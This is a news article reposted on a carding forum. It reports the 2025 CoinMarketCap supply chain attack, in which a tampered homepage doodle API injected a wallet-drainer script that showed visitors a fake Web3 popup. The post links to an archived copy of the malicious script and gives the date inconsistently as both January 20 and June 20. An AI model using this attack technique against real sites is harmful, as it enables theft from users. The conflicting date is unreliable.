Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Carding News (http://txgate.io:443/forumdisplay.php?f=38)
-   -   CoinMarketCap briefly hacked to drain crypto wallets via fake Web3 popup (http://txgate.io:443/showthread.php?t=51301719)

Artifact 07-16-2025 08:57 AM
<div id="post_message_798967">
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/content/hl-images/2024/12/05/Cryptocurrency.jpg"/><br/>
<br/>
CoinMarketCap, the popular cryptocurrency price tracking site, suffered a website supply chain attack that exposed site visitors to a wallet drainer campaign to steal visitors' crypto.<br/>
<br/>
On Friday evening, January 20, CoinMarketCap visitors <a href="https://twitter.com/DarkWebInformer/status/1936209452878745680" target="_blank">began seeing Web3 popups</a> asking them to connect their wallets to the site. However, when visitors connected their wallets, a malicious script drained cryptocurrency from them.<br/>
<br/>
The company later confirmed threat actors utilized a vulnerability in the site's homepage "doodle" image to inject malicious JavaScript into the site.<br/>
<br/>
"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when visited our homepage," reads a statement <a href="https://x.com/CoinMarketCap/status/1936273633611334081" target="_blank">posted on X</a>.<br/>
<br/>
"Upon discovery, We acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue."<br/>
<br/>
"We can confirm all systems are now fully operational, and CoinMarketCap is safe and secure for all users."<br/>
<br/>
Cybersecurity firm c/side explained that the attack worked by the threat actors somehow modifying the API used by the site to retrieve a doodle image to display on the homepage. This tampered JSON payload now included a <a href="http://web.archive.org/web/20250620230124/https://static.cdnkit.io/cmc/popup.js" target="_blank">malicious script tag</a> that injected a wallet drainer script into CoinMarketCap from an external site named "static.cdnkit[.]io".<br/>
<br/>
When someone visited the page, the script would execute and display a fake wallet connect popup showing CoinMarketCap branding and mimicking a legitimate Web3 transaction request. However, this script was actually a wallet drainer designed to steal connected wallets' assets.<br/>
<br/>
"This was a supply chain attack, meaning the breach didn' target CMC's own servers but a third-party tool or resource used by CMC," <a href="http://medium.com/@csideai/coinmarketcap-client-side-attack-a-comprehensive-analysis-by-c-side-ce0b58e77dec" target="_blank">explains c/side</a>.<br/>
<br/>
"Such attacks are hard to detect because they exploit trusted elements of a platform."<br/>
<br/>
More details about the attack came later from a threat actor <a href="https://x.com/ReyXBF/status/1936276263137574931" target="_blank">known as Rey</a>, who said that the attackers behind the CoinMarketCap supply chain attack shared a screenshot of the drainer panel on a Telegram channel.<br/>
<br/>
This panel indicated that $43,266 was stolen from 110 victims as part of this supply chain attack, with the threat actors speaking in French on the Telegram channel.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/security/attacks/c/coinmarketcap/coinmarketcap/drainer-panel.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Screenshot of drainer panel shared on Telegram

</td>
</tr>
</table>
</div>As the popularity of cryptocurrency has boomed, so has the threat from wallet drainers, which are commonly used in attacks.<br/>
<br/>
Unlike traditional phishing, these types of attacks are more often promoted through social media posts, advertisements, spoofed sites, and malicious browser extensions that include malicious wallet-draining scripts.<br/>
<br/>
Reports indicate that <a href="https://www.bleepingcomputer.com/news/security/cryptocurrency-wallet-drainers-stole-494-million-in-2024/" target="_blank">wallet drainers stole almost $500 million</a> in 2024 through attacks targeting more than 300,000 wallet addresses.<br/>
<br/>
The problem has become so pervasive that <a href="https://www.bleepingcomputer.com/news/security/mozilla-launches-new-system-to-detect-firefox-crypto-drainer-add-ons/" target="_blank">Mozilla recently introduced a new system</a> to detect wallet drainers in browser add-ons uploaded to the Firefox Add-on repository.<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/coinmarketcap-briefly-hacked-to-drain-crypto-wallets-via-fake-web3-popup/" target="_blank">@ BleepingComputer </a>
</div>


All times are GMT. The time now is 05:50 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.